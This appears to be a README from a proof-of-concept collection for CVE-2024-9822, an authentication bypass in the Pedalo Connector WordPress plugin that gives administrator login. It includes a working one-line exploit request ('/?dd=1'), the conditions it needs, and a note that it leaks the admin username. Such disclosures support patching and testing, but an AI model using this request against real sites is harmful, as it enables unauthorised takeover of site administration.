Pedalo Connector <= 2.0.5 - Authentication Bypass to Administrator# CVE-2024-9822
Pedalo Connector <= 2.0.5 - Authentication Bypass to Administrator
# Description
The Pedalo Connector plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.5. This is due to insufficient restriction on the 'login_admin_user' function. This makes it possible for unauthenticated attackers to log to the first user, who is usually the administrator, or if it does not exist, then to the first administrator.
```
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9822
Slug: pedalo-connector
```
Download Link: [Download pedalo-connector Version 2.0.5](https://downloads.wordpress.org/plugin/pedalo-connector.2.0.5.zip)
POC
---
```
/?dd=1
```
Needs the Pedalo Connector activated and have the site health thing running. if it's not connected correctly you just get redirected to the login page with the admin username.
[4.0K] /data/pocs/487658f53055b1f6e18ce1b27329e6e593a9564d
└── [ 878] README.md
0 directories, 1 file